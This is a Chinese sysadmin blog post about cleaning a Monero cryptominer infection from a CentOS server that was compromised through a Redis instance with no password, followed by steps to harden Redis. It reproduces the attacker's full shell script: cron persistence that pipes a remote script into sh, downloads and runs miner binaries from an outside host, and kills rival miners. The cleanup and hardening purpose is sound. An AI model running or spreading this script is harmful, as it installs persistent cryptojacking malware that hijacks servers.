写程序的时候,发现redis异常,程序启动死慢,用top命令查看了一下,cpu被占用接近100%
发生原因:在centos上安装redis并且启动 没有进行权限设置 这非常危险

Redis 未授权访问缺陷可轻易导致系统被黑 Sebug 公布了 Redis 未授权访问缺陷的详细漏洞信息,这个 Redis 未授权访问缺陷可轻易导致系统被黑。
漏洞详情:blog.jobbole.com/94518/
最佳解决方案提问(US):http://security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance

I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script –

  1. On monkeyoto‘s suggestion, I blocked all communication with the mining pool server – iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
  2. Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
  3. Removed the directory /opt/yam.
  4. Removed /root/.ssh/KHK75NEOiq.
  5. Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
  6. Stopped the minerd process – pkill minerd.
  7. Stopped ladyservice lady stop.

I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

20160714143658196

QQ截图20170131221328

首先保持冷静 先关掉您的redis

ps -ef | grep AnXqV 找到进程并kill 进程 这时你发现没什么卵用 过没多久 病毒又自启动了

这时我执行crontab -l 命令查看定时任务

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh

执行了定时任务 删除所有的执行计划 crontab -r

再将 /var/spool/cron/crontabs/root 文件内的入侵任务删除

完整执行代码 #本入侵代码可能会随时变化

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
crontab -r #如果您还有其他定时任务执行 请不要使用该命令 请修改定时任务删除入侵所在行
vi /var/spool/cron/crontabs/root #删除入侵行代码 :wq
service lady stop

这时可以轻松看到病毒shell

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0129 | sh" > /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddg.219" ]; then
    curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.219
fi
chmod +x /tmp/ddg.219 && /tmp/ddg.219

CleanTail()
{
    ps auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
}

DoYam()
{
    if [ ! -f "/tmp/AnXqV.yam" ]; then
        curl -fsSL http://www.haveabitchin.com/yam -o /tmp/AnXqV.yam
    fi
    chmod +x /tmp/AnXqV.yam
    /tmp/AnXqV.yam -c x -M stratum+tcp://47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54:x@xmr.crypto-pool.fr:443/xmr
}

DoMiner()
{
    if [ ! -f "/tmp/AnXqV" ]; then
        curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV
    fi
    chmod +x /tmp/AnXqV
    /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB.01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54 -p x
}
ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "47sghzufGhJJDQEbScMCwVBimTuq6L5JiRixD8VeGbpjCTA12noXmi4ZyBZLc99e66NtnKff34fHsGRoyZk3ES1s1V4QVcB+01c32d313b74a859b904079c69dbc04ea6e37eddcf4aeb34e9400cc12831da54"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "AnXqV" || DoMiner
ps auxf|grep -v grep|grep "AnXqV" || DoYam

这个病毒并没有硬把我的系统搞瘫痪 监控内存情况 还是比较乐观的

下面应当对redis的后门进行修复设置 如上的解决方案治标不治本 除非你不用redis了

设置redis设置

1、设置auth密码并修改端口号 进入redis安装目录

cd /home/redis-2.8.17/src/
vi redis.conf
###
port 110
requirepass mypassword
### :wq
./redis-server ./redis.conf &

当使用./redis-cli控制台的时候先输入校验 如果改变端口号了 加 -p参数进入
auth mypassword

redis config配置说明 http://www.runoob.com/redis/redis-conf.html

           _.-``__ ''-._                                             
      _.-``    `.  `_.  ''-._           Redis 2.8.17 (00000000/0) 64 bit
  .-`` .-```.  ```\/    _.,_ ''-._                                   
 (    '      ,       .-`  | `,    )     Running in stand alone mode
 |`-._`-...-` __...-.``-._|'` _.-'|     Port: 110
 |    `-._   `._    /     _.-'    |     PID: 1754
  `-._    `-._  `-./  _.-'    _.-'                                   
 |`-._`-._    `-.__.-'    _.-'_.-'|                                  
 |    `-._`-._        _.-'_.-'    |           http://redis.io        
  `-._    `-._`-.__.-'_.-'    _.-'                                   
 |`-._`-._    `-.__.-'    _.-'_.-'|                                  
 |    `-._`-._        _.-'_.-'    |                                  
  `-._    `-._`-.__.-'_.-'    _.-'                                   
      `-._    `-.__.-'    _.-'                                       
          `-._        _.-'                                           
              `-.__.-'                                               

如果本篇文章对您有帮助,请关注本人Github 举手之劳感谢
https://github.com/okfirelee

centos7安装openssl

yum install openssl yum install openssl-devel 最开始在网上找教程安装的是libssl-dev,显示No package libssl-dev available.Error: Nothing to do,找...

阅读全文

linux centos 宝塔主机控制面板安装和安全狗安装过程记录

linux 宝塔控制面板 安装过程 yum install -y wget && wget -O install.sh http://103.224.251.79:5880/install/install.sh && sh install....

阅读全文

CentOS虚拟机VM和物理机共享文件夹实现

CentOS虚拟机和物理机共享文件夹实现过程。 一、  安装VMware Tools VMwareTools的安装脚本是要使用到perl的,而CentOS 6自身不带perl,所以需要自己安装。可...

阅读全文

评论已经关闭。